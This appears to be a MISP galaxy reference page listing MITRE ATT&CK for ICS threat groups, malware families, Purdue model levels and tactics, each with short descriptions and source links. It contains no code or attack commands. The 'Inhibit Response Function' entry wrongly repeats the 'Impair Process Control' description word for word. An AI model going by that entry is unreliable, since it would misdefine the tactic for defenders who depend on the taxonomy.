ALLANITE is a suspected Russian cyber espionage group, that has primarily targeted the electric utility sector within the United States and United Kingdom. The group’s tactics and techniques are reportedly similar to Dragonfly / Dragonfly 2.0, although ALLANITE’s technical capabilities have not exhibited disruptive or destructive abilities. It has been suggested that the group maintains a presence in ICS for the purpose of gaining understanding of processes and to maintain persistence.

The tag is: misp-galaxy:mitre-ics-groups="ALLANITE"

ALLANITE has relationships with:

  • similar: misp-galaxy:threat-actor="ALLANITE" with estimative-language:likelihood-probability="almost-certain"

Table 6886. Table References

Links

https://dragos.com/resource/allanite/

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk

https://www.eisac.com/public-news-detail?id=115909

APT33

APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.

The tag is: misp-galaxy:mitre-ics-groups="APT33"

APT33 has relationships with:

  • similar: misp-galaxy:threat-actor="APT33" with estimative-language:likelihood-probability="almost-certain"

Table 6887. Table References

Links

https://attack.mitre.org/groups/G0064/

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://dragos.com/resource/magnallium/

https://www.wired.com/story/iran-hackers-us-phishing-tensions/

https://www.symantec.com/security-center/writeup/2017-030708-4403-99

Dragonfly

Dragonfly is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013. They have also targeted companies related to industrial control systems. A similar group emerged in 2015 and was identified by Symantec as Dragonfly 2.0. There is debate over the extent of the overlap between Dragonfly and Dragonfly 2.0, but there is sufficient evidence to lead to these being tracked as two separate groups.

The tag is: misp-galaxy:mitre-ics-groups="Dragonfly"

Table 6888. Table References

Links

https://attack.mitre.org/groups/G0035/

https://dragos.com/resource/dymalloy/

https://www.us-cert.gov/ncas/alerts/TA17-293A

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

Dragonfly 2.0

Dragonfly 2.0 is a suspected Russian threat group which has been active since at least late 2015. Dragonfly 2.0’s initial reported targets were a part of the energy sector, located within the United States, Switzerland, and Turkey. There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly, but there is sufficient evidence to lead to these being tracked as two separate groups.

The tag is: misp-galaxy:mitre-ics-groups="Dragonfly 2.0"

Table 6889. Table References

Links

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

https://fortune.com/2017/09/06/hack-energy-grid-symantec/

https://dragos.com/resource/dymalloy/

https://blog.talosintelligence.com/2017/07/template-injection.html

https://dragos.com/wp-content/uploads/Sample-WorldView-Report.pdf

https://dragos.com/wp-content/uploads/yir-ics-activity-groups-threat-landscape-2018.pdf

HEXANE

HEXANE is a threat group that has targeted ICS organization within the oil & gas, and telecommunications sectors. Many of the targeted organizations have been located in the Middle East including Kuwait. HEXANE’s targeting of telecommunications has been speculated to be part of an effort to establish man-in-the-middle capabilities throughout the region. HEXANE’s TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity.

The tag is: misp-galaxy:mitre-ics-groups="HEXANE"

Table 6890. Table References

Links

https://dragos.com/resource/hexane/

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

https://www.securityweek.com/researchers-analyze-tools-used-hexane-attackers-against-industrial-firms

https://www.bankinfosecurity.com/lyceum-apt-group-new-threat-to-oil-gas-companies-a-13003

Lazarus group

Lazarus group is a suspected North Korean adversary group that has targeted networks associated with civilian electric energy in Europe, East Asia, and North America. Links have been established associating this group with the WannaCry ransomware from 2017.3 While WannaCry was not an ICS focused attack, Lazarus group is considered to be a threat to ICS. North Korean group definitions are known to have significant overlap, and the name Lazarus Group is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea. Some organizations track North Korean clusters or groups such as Bluenoroff, APT37, and APT38 separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.

The tag is: misp-galaxy:mitre-ics-groups="Lazarus group"

Lazarus group has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="almost-certain"

Table 6891. Table References

Links

https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity

https://dragos.com/resource/covellite/

https://www.us-cert.gov/ncas/alerts/TA17-132A

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://www.us-cert.gov/ncas/alerts/TA17-164A

https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/

https://www.securityweek.com/five-threat-groups-target-industrial-systems-dragos

https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group

Leafminer

Leafminer is a threat group that has targeted Saudi Arabia, Japan, Europe and the United States. Within the US, Leafminer has targeted electric utilities and initial access into those organizations. Reporting indicates that Leafminer has not demonstrated ICS specific or destructive capabilities.

The tag is: misp-galaxy:mitre-ics-groups="Leafminer"

Table 6892. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east

https://dragos.com/resource/raspite/

OilRig

OilRig is a suspected Iranian threat group that has targeted the financial, government, energy, chemical, and telecommunication sectors as well as petrochemical, oil & gas. OilRig has been observed operating in Iraq, Pakistan, Israel, and the UK, and has been linked to the Shamoon attacks in 2012 on Saudi Aramco.

The tag is: misp-galaxy:mitre-ics-groups="OilRig"

OilRig has relationships with:

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="almost-certain"

Table 6893. Table References

Links

https://www.fireeye.com/current-threats/apt-groups.html#apt34

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

https://dragos.com/resource/chrysene/

https://unit42.paloaltonetworks.com/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://www.cyberviser.com/2018/05/group-linked-to-shamoon-attacks-targeting-ics-networks-in-middle-east-and-uk/

Sandworm

Sandworm is a threat group associated with the Kiev, Ukraine electrical transmission substation attacks which resulted in the impact of electric grid operations on December 17th, 2016. Sandworm has been cited as the authors of the Industroyer malware which was used in the 2016 Ukraine attacks.

The tag is: misp-galaxy:mitre-ics-groups="Sandworm"

Sandworm has relationships with:

  • similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="almost-certain"

Table 6894. Table References

Links

https://dragos.com/resource/electrum/

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html

https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B

https://www.us-cert.gov/ics/advisories/ICSA-11-094-02B

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/

XENOTIME

XENOTIME is a threat group that has targeted and compromised industrial systems, specifically safety instrumented systems that are designed to provide safety and protective functions. Xenotime has previously targeted oil & gas, as well as electric sectors within the Middle east, Europe, and North America. Xenotime has also been reported to target ICS vendors, manufacturers, and organizations in the middle east. This group is one of the few with reported destructive capabilities.

The tag is: misp-galaxy:mitre-ics-groups="XENOTIME"

Table 6895. Table References

Links

https://dragos.com/resource/xenotime/

https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html

https://www.cyberscoop.com/xenotime-ics-cyber-attacks-trisis-dragos/

https://dragos.com/blog/trisis/TRISIS-01.pdf

https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf

Levels

Based on the Purdue Model to aid ATT&CK for ICS users to understand which techniques are applicable to their environment..

Levels is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Level 0

The I/O network level includes the actual physical processes and sensors and actuators that are directly connected to process equipment.

The tag is: misp-galaxy:mitre-ics-levels="Level 0"

Level 1

The control network level includes the functions involved in sensing and manipulating physical processes. Typical devices at this level are programmable logic controllers (PLCs), distributed control systems, safety instrumented systems and remote terminal units (RTUs).

The tag is: misp-galaxy:mitre-ics-levels="Level 1"

Level 2

The supervisory control LAN level includes the functions involved in monitoring and controlling physical processes and the general deployment of systems such as human-machine interfaces (HMIs), engineering workstations and historians.

The tag is: misp-galaxy:mitre-ics-levels="Level 2"

Software

Software is a generic term for custom or commercial code, operating system utilities, open-source software, or other tools used to conduct behavior modeled in ATT&CK for ICS..

Software is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

ACAD/Medre.A

ACAD/Medre.A is a worm that steals operational information. The worm collects AutoCAD files with drawings. ACAD/Medre.A has the capability to be used for industrial espionage.

The tag is: misp-galaxy:mitre-ics-software="ACAD/Medre.A"

Table 6896. Table References

Links

Backdoor.Oldrea, Havex

Backdoor.Oldrea is a Remote Access Trojan (RAT) that communicates with a Command and Control (C2) server. The C2 server can deploy payloads that provide additional functionality. One payload has been identified and analyzed that enumerates all connected network resources, such as computers or shared resources, and uses the classic DCOM-based (Distributed Component Object Model) version of the Open Platform Communications (OPC) standard to gather information about connected control system devices and resources within the network.

The tag is: misp-galaxy:mitre-ics-software="Backdoor.Oldrea, Havex"

Table 6897. Table References

Links

https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01

https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-176-02A

https://www.f-secure.com/weblog/archives/00002718.html

https://pdfs.semanticscholar.org/18df/43ef1690b0fae15a36f770001160aefbc6c5.pdf

https://www.fireeye.com/blog/threat-research/2014/07/havex-its-down-with-opc.html

https://www.symantec.com/connect/blogs/dragonfly-western-energy-companies-under-sabotage-threat

https://www.youtube.com/watch?v=eywmb7UDODY&feature=youtu.be&t=939

https://www.sans.org/reading-room/whitepapers/ICS/impact-dragonfly-malware-industrial-control-systems-36672

Bad Rabbit, Diskcoder.D

Bad Rabbit is a self-propagating (“wormable”) ransomware that affected the transportation sector in Ukraine.

The tag is: misp-galaxy:mitre-ics-software="Bad Rabbit, Diskcoder.D"

Table 6898. Table References

Links

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

https://securelist.com/bad-rabbit-ransomware/82851/

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

BlackEnergy 3

BlackEnergy 3 is a malware toolkit that has been used by both criminal and APT actors. It support various plug-ins including a variant of KillDisk. It is known to have been used against the Ukrainian power grid.

The tag is: misp-galaxy:mitre-ics-software="BlackEnergy 3"

Table 6899. Table References

Links

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

Conficker

Conficker is a computer worm that targets Microsoft Windows and was first detected in November 2008. It targets a vulnerability (MS08-067) in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet. Conficker made its way onto computers and removable disk drives in a nuclear power plant.

The tag is: misp-galaxy:mitre-ics-software="Conficker"

Table 6900. Table References

Links

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

Duqu

Duqu is a collection of computer malware discovered in 2011. It is reportedly related to the Stuxnet worm, although Duqu is not self-replicating.

The tag is: misp-galaxy:mitre-ics-software="Duqu"

Table 6901. Table References

Links

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Flame

Flame is an attacker-instructed worm which may open a backdoor and steal information from a compromised computer. Flame has the capability to be used for industrial espionage.

The tag is: misp-galaxy:mitre-ics-software="Flame"

Table 6902. Table References

Links

https://www.symantec.com/security-center/writeup/2012-052811-0308-99

https://www.welivesecurity.com/2012/07/20/flame-in-depth-code-analysis-of-mssecmgr-ocx/

https://www.fireeye.com/blog/threat-research/2012/05/flamerskywiper-analysis.html

Industroyer

Industroyer is a sophisticated piece of malware designed to cause an Impact to the working processes of Industrial Control Systems (ICS), specifically ICSs used in electrical substations.1 Industroyer was alleged to be used in the attacks on the Ukrainian power grid in December 2016.

The tag is: misp-galaxy:mitre-ics-software="Industroyer"

Table 6903. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.us-cert.gov/ncas/alerts/TA17-163A

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://dragos.com/wp-content/uploads/CRASHOVERRIDE.pdf

KillDisk

In 2015 the BlackEnergy malware contained a component called KillDisk. KillDisk’s main functionality is to overwrite files with random data, rendering the OS unbootable.

The tag is: misp-galaxy:mitre-ics-software="KillDisk"

Table 6904. Table References

Links

https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

LockerGoga

LockerGoga is ransomware that has been tied to various attacks on industrial and manufacturing firms with apparently catastrophic consequences.

The tag is: misp-galaxy:mitre-ics-software="LockerGoga"

Table 6905. Table References

Links

https://www.wired.com/story/lockergoga-ransomware-crippling-industrial-firms/

https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880

https://www.hydro.com/en/media/on-the-agenda/cyber-attack/

NotPetya

NotPetya is malware that was first seen in a worldwide attack starting on June 27, 2017. The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though NotPetya presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, NotPetya may be more appropriately thought of as a form of wiper malware. NotPetya contains self-propagating (“wormable”) features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.

The tag is: misp-galaxy:mitre-ics-software="NotPetya"

Table 6906. Table References

Links

https://attack.mitre.org/software/S0368/

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

https://www.bloomberg.com/news/features/2019-12-03/merck-cyberattack-s-1-3-billion-question-was-it-an-act-of-war

PLC-Blaster

PLC-Blaster is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them. Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules.

The tag is: misp-galaxy:mitre-ics-software="PLC-Blaster"

Table 6907. Table References

Links

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

Ryuk

Ryuk is ransomware that was first seen targeting large organizations for high-value ransoms in August of 2018. Ryuk temporarily disrupted operations at a manufacturing firm in 2018.

The tag is: misp-galaxy:mitre-ics-software="Ryuk"

Table 6908. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.darkreading.com/attacks-breaches/how-a-manufacturing-firm-recovered-from-a-devastating-ransomware-attack/d/d-id/1334760

Stuxnet

Stuxnet was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different complex tactics including multiple zero-day vulnerabilites, a sophisticated Windows rootkit, and network infection routines.

The tag is: misp-galaxy:mitre-ics-software="Stuxnet"

Table 6909. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://www.symantec.com/security-center/writeup/2010-071400-3123-99

https://www.us-cert.gov/ics/advisories/ICSA-10-238-01B

https://scadahacker.com/resources/stuxnet-mitigation.html

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

VPNFilter

VPNFilter is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. VPNFilter modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols

The tag is: misp-galaxy:mitre-ics-software="VPNFilter"

Table 6911. Table References

Links

https://blog.talosintelligence.com/2018/06/vpnfilter-update.html

https://www.youtube.com/watch?v=yuZazP22rpI

WannaCry

WannaCry is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains self-propagating (“wormable”) features to spread itself across a computer network using the SMBv1 exploit EternalBlue.

The tag is: misp-galaxy:mitre-ics-software="WannaCry"

Table 6912. Table References

Links

https://attack.mitre.org/software/S0366/

https://www.us-cert.gov/ncas/alerts/TA17-132A

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

Tactics

A list of all 11 tactics in ATT&CK for ICS.

Tactics is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Collection

The adversary is trying to gather data of interest and domain knowledge on your ICS environment to inform their goal. Collection consists of techniques adversaries use to gather domain knowledge and obtain contextual feedback in an ICS environment. This tactic is often performed as part of Discovery, to compile data on control systems and targets of interest that may be used to follow through on the adversary’s objective. Examples of these techniques include observing operation states, capturing screenshots, identifying unique device roles, and gathering system and diagram schematics. Collection of this data can play a key role in planning, executing, and even revising an ICS-targeted attack. Methods of collection depend on the categories of data being targeted, which can include protocol specific, device specific, and process specific configurations and functionality. Information collected may pertain to a combination of system, supervisory, device, and network related data, which conceptually fall under high, medium, and low levels of plan operations. For example, information repositories on plant data at a high level or device specific programs at a low level. Sensitive floor plans, vendor device manuals, and other refs may also be at risk and exposed on the internet or otherwise publicly accessible.

The tag is: misp-galaxy:mitre-ics-tactics="Collection"

Table 6913. Table References

Links

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

http://www.research.lancs.ac.uk/portal/files/196578358/sample_sigconf.pdf

https://www.us-cert.gov/ncas/alerts/TA17-293A

Command and Control

The adversary is trying to communicate with and control compromised systems, controllers, and platforms with access to your ICS environment. Command and Control consists of techniques that adversaries use to communicate with and send commands to compromised systems, devices, controllers, and platforms with specialized applications used in ICS environments. Examples of these specialized communication devices include human machine interfaces (HMIs), data historians, SCADA servers, and engineering workstations (EWS). Adversaries often seek to use commonly available resources and mimic expected network traffic to avoid detection and suspicion. For instance, commonly used ports and protocols in ICS environments, and even expected IT resources, depending on the target network. Command and Control may be established to varying degrees of stealth, often depending on the victim’s network structure and defenses.

The tag is: misp-galaxy:mitre-ics-tactics="Command and Control"

Table 6914. Table References

Links

https://attack.mitre.org/wiki/Technique/T1090

Discovery

The adversary is trying to figure out your ICS environment. Discovery consists of techniques that adversaries use to survey your ICS environment and gain knowledge about the internal network, control system devices, and how their processes interact. These techniques help adversaries observe the environment and determine next steps for target selection and Lateral Movement. They also allow adversaries to explore what they can control and gain insight on interactions between various control system processes. Discovery techniques are often an act of progression into the environment which enable the adversary to orient themselves before deciding how to act. Adversaries may use Discovery techniques that result in Collection, to help determine how available resources benefit their current objective. A combination of native device communications and functions, and custom tools are often used toward this post-compromise information-gathering objective.

The tag is: misp-galaxy:mitre-ics-tactics="Discovery"

Table 6915. Table References

Links

https://attack.mitre.org/wiki/Technique/T1049

https://attack.mitre.org/wiki/Technique/T1040

https://attack.mitre.org/wiki/Technique/T1018

Evasion

The adversary is trying to avoid being detected.Evasion consists of techniques that adversaries use to avoid detection by both human operators and technical defenses throughout their compromise. Techniques used for evasion include removal of indicators of compromise, spoofing communications and reporting, and exploiting software vulnerabilities. Adversaries may also leverage and abuse trusted devices and processes to hide their activity, possibly by masquerading as master devices or native software. Methods of defense and operator evasion for this purpose are often more passive in nature, as opposed to Inhibit Response Function techniques. They may also vary depending on whether the target of evasion is human or technological in nature, such as security controls. Techniques under other tactics are cross-listed to evasion when those techniques include the added benefit of subverting operators and defenses.

The tag is: misp-galaxy:mitre-ics-tactics="Evasion"

Table 6916. Table References

Links

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://attack.mitre.org/wiki/Technique/T1014

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

Execution

The adversary is trying to run malicious code. Execution consists of techniques that result in adversary-controlled code running on a local or remote system, device, or other asset. This execution may also rely on unknowing end users or the manipulation of device operating modes to run. Adversaries may infect remote targets with programmed executables or malicious project files that operate according to specified behavior and may alter expected device behavior in subtle ways. Commands for execution may also be issued from command-line interfaces, APIs, GUIs, or other available interfaces. Techniques that run malicious code may also be paired with techniques from other tactics, particularly to aid network Discovery and Collection, impact operations, and inhibit response functions.

The tag is: misp-galaxy:mitre-ics-tactics="Execution"

Table 6917. Table References

Links

https://attack.mitre.org/wiki/Technique/T1059

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.sans.org/reading-room/whitepapers/ICS/man-in-the-middle-attack-modbus-tcp-illustrated-wireshark-38095

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

http://www.dee.ufrj.br/controle_automatico/cursos/IEC61131-3_Programming_Industrial_Automation_Systems.pdf

https://cdn.selinc.com/assets/Literature/Publications/Technical%20Papers/6560_PracticalApplications_MW_20120224_Web.pdf?v=20151125-003051

https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf

https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf

https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id=

http://www.plcdev.com/book/export/html/373

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

https://www.f-secure.com/weblog/archives/00002718.html

Impact

The adversary is trying to manipulate, interrupt, or destroy your ICS systems, data, and their surrounding environment. Impact consists of techniques that adversaries use to disrupt, compromise, destroy, and manipulate the integrity and availability of control system operations, processes, devices, and data. These techniques encompass the influence and effects resulting from adversarial efforts to attack the ICS environment or that tangentially impact it. Impact techniques can result in more instantaneous disruption to control processes and the operator, or may result in more long term damage or loss to the ICS environment and related operations. The adversary may leverage Impair Process Control techniques, which often manifest in more self-revealing impacts on operations, or Inhibit Response Function techniques to hinder safeguards and alarms in order to follow through with and provide cover for Impact. In some scenarios, control system processes can appear to function as expected, but may have been altered to benefit the adversary’s goal over the course of a longer duration. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach. Loss of Productivity and Revenue, Theft of Operational Information, and Damage to Property are meant to encompass some of the more granular goals of adversaries in targeted and untargeted attacks. These techniques in and of themselves are not necessarily detectable, but the associated adversary behavior can potentially be mitigated and/or detected.

The tag is: misp-galaxy:mitre-ics-tactics="Impact"

Table 6918. Table References

Links

https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?blob=publicationFile&v=3

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.londonreconnections.com/2017/hacked-cyber-security-railways/

https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html

https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf

https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297

https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false

https://time.com/4270728/iran-cyber-attack-dam-fbi/

https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559

Impair Process Control

The adversary is trying to manipulate, disable, or damage physical control processes. Impair Process Control consists of techniques that adversaries use to disrupt control logic and cause determinantal effects to processes being controlled in the target environment. Targets of interest may include active procedures or parameters that manipulate the physical environment. These techniques can also include prevention or manipulation of reporting elements and control logic. If an adversary has modified process functionality, then they may also obfuscate the results, which are often self-revealing in their impact on the outcome of a product or the environment. The direct physical control these techniques exert may also threaten the safety of operators and downstream users, which can prompt response mechanisms. Adversaries may follow up with or use Inhibit Response Function techniques in tandem, to assist with the successful abuse of control processes to result in Impact.

The tag is: misp-galaxy:mitre-ics-tactics="Impair Process Control"

Table 6919. Table References

Links

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices

https://attack.mitre.org/techniques/T1489/

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

Inhibit Response Function

The adversary is trying to manipulate, disable, or damage physical control processes. Impair Process Control consists of techniques that adversaries use to disrupt control logic and cause determinantal effects to processes being controlled in the target environment. Targets of interest may include active procedures or parameters that manipulate the physical environment. These techniques can also include prevention or manipulation of reporting elements and control logic. If an adversary has modified process functionality, then they may also obfuscate the results, which are often self-revealing in their impact on the outcome of a product or the environment. The direct physical control these techniques exert may also threaten the safety of operators and downstream users, which can prompt response mechanisms. Adversaries may follow up with or use Inhibit Response Function techniques in tandem, to assist with the successful abuse of control processes to result in Impact.

The tag is: misp-galaxy:mitre-ics-tactics="Inhibit Response Function"

Table 6920. Table References

Links

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf

http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://attack.mitre.org/wiki/Technique/T1107

https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A

https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01

http://cwe.mitre.org/data/definitions/400.html

https://nvd.nist.gov/vuln/detail/CVE-2015-5374

https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

https://attack.mitre.org/wiki/Technique/T1014

http://www.sciencedirect.com/science/article/pii/S1874548213000231

Initial Access

The adversary is trying to get into your ICS environment. Initial Access consists of techniques that adversaries may use as entry vectors to gain an initial foothold within an ICS environment. These techniques include compromising operational technology assets, IT resources in the OT network, and external remote services and websites. They may also target third party entities and users with privileged access. In particular, these initial access footholds may include devices and communication mechanisms with access to and privileges in both the IT and OT environments. IT resources in the OT environment are also potentially vulnerable to the same attacks as enterprise IT systems. Trusted third parties of concern may include vendors, maintenance personnel, engineers, external integrators, and other outside entities involved in expected ICS operations. Vendor maintained assets may include physical devices, software, and operational equipment. Initial access techniques may also leverage outside devices, such as radios, controllers, or removable media, to remotely interfere with and possibly infect OT operations.

The tag is: misp-galaxy:mitre-ics-tactics="Initial Access"

Table 6921. Table References

Links

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://www.us-cert.gov/ncas/alerts/TA18-074A

https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B

https://attack.mitre.org/wiki/Technique/T1133

https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf

https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/

https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01

https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html

https://www.us-cert.gov/sites/default/files/Monitors/ICS-CERT_Monitor_Jan-April2014.pdf

https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559

https://time.com/4270728/iran-cyber-attack-dam-fbi/

https://www.kkw-gundremmingen.de/presse.php?id=571

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-plant

https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant

https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/

https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/

https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298

https://www.bbc.com/news/technology-36158606

https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/

https://attack.mitre.org/techniques/T1193/

https://www.f-secure.com/weblog/archives/00002718.html

https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf

https://www.slideshare.net/dgpeters/17-bolshev-1-13

https://www.mitre.org/sites/default/files/pdf/08_1145.pdf

https://www.londonreconnections.com/2017/hacked-cyber-security-railways/

https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/

